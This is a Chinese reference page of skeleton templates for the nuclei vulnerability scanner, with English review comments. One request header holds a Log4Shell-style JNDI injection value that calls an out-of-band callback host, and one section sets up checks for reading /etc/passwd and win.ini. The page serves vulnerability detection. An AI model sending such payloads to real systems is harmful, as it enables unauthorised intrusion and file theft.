nuclei常用templates模板

GET

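# Skeleton nuclei template: one raw HTTP request plus a DSL matcher.
# Copy it and fill in the id, info block and request/matcher placeholders.
id: base

info:
  name: base
  author: msk
  description: 描述漏洞基本情况  # one-line description of the issue
  severity: info  # severity level (info/low/medium/high/critical)
  reference:
    - https://www.exploit-db.com/ghdb/6814  # source of the finding
  tags: detect  # comma-separated tags
  metadata:
    # was "veified" — metadata is a free-form map, so the misspelling was
    # never rejected and the flag simply did not exist under its intended key
    verified: true
    fofa-query: fofa语法  # FOFA search query for the affected product
    hunter-query: 鹰图语法  # Hunter (鹰图) search query for the affected product

# NOTE(review): the Cookie header below carries an out-of-band
# ({{interactsh-url}}) probe that none of the matchers reference — it looks
# like a leftover from a specific check and does not belong in a generic base.
http:
  - raw:
      - |
        GET /xxxx/xxx HTTP/1.1
        Host: {{Hostname}}
        Connection: keep-alive
        Cookie: OFBiz.Visitor=${jndi:ldap://{{interactsh-url}}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
        Content-Type: application/json;charset=UTF-8
        user-client: 1

    matchers:
      - type: dsl
        dsl:
          # require a 200 plus every listed keyword in the response body
          - 'status_code==200 && contains_all(body,"xxx1","xxx2")'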
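# GET template: one path, a regex match on the response and a 200 status.
id: CVE-xxxx-xxxxx

info:
  name: naturehi
  author: naturehi
  # NOTE(review): add `severity:` (and ideally description/reference) here;
  # nuclei expects it next to name and author.

# `requests:` is the old spelling of this key; newer nuclei releases use
# `http:` (the other templates on this page already do) and only keep
# `requests:` as a deprecated alias.
http:
  - method: GET
    path:
      - "{{BaseURL}}/(poc部分)"

    stop-at-first-match: true
    matchers-condition: and  # both matchers below must hit
    matchers:
      - type: regex
        regex:
          - "(你具体要在响应包所匹配的值)"

      - type: status
        status:
          - 200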

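# GET template that sends an arithmetic expression and looks for its
# computed result in the body, i.e. proof that the target evaluated it
# rather than echoing it back.
id: CNVD-xxxx

info:
  name: naturehi
  author: naturehi

variables:
  # two random six-digit factors, so the expected product is unlikely to
  # appear in a page by coincidence
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - method: GET
    path:
      # the original listed this exact path twice; an identical second entry
      # only repeats the request, so add more entries here only if they differ
      - "{{BaseURL}}/(poc){{num1}}*{{num2}}"

    stop-at-first-match: true
    matchers-condition: and  # product present AND status 200
    matchers:
      - type: word
        part: body
        words:
          - "{{result}}"

      - type: status
        status:
          - 200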

POST请求


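# POST template: raw form-encoded request, regex match on the response
# and a 200 status.
id: CNVD-xxx-xxxx

info:
  name: naturehi
  author: naturehi
  metadata:
    # single-quoted because the value itself contains double quotes
    fofa-query: 'app="Landray OA system"'

# `requests:` is the deprecated alias of `http:` — use the current key.
http:
  - raw:
      # exactly one blank line separates headers from body; the original
      # showed two, which would prepend an empty line to the body (possibly
      # an artifact of how the page was rendered)
      - |
        POST /(poc路径) HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"POST请求值"}}

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "(需要匹配的特征值)"
        condition: or  # only matters once more than one regex is listed

      - type: status
        status:
          - 200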
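# Minimal POST template: raw request and a single regex matcher (no
# matchers-condition needed with just one matcher).
id: CNVD-xxx-xxx

info:
  name: naturehi
  author: naturehi

# `requests:` is the deprecated alias of `http:` — use the current key.
http:
  - raw:
      # request line fixed: the original read "/(poc)HTTP/1.1" with no space
      # before the protocol token, which is not a valid request line
      - |
        POST /(poc) HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        (poc请求值)

    matchers:
      - type: regex
        regex:
          - "(需要匹配的值)"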

文件读取

/etc/passwd

# Matcher fragment for a Linux file-read check: the root entry of
# /etc/passwd is "root:<x>:0:0:", so look for that in the response body.
matchers:
  - type: regex
    part: body
    regex:
      - "root:.*:0:0:"

C:/windows/win.ini

# Matcher fragment for a Windows file-read check: C:/windows/win.ini
# contains the phrase "bit app support", so look for it in the body.
matchers:
  - type: regex
    part: body
    regex:
      - "bit app support"

匹配返回包中的值

__END__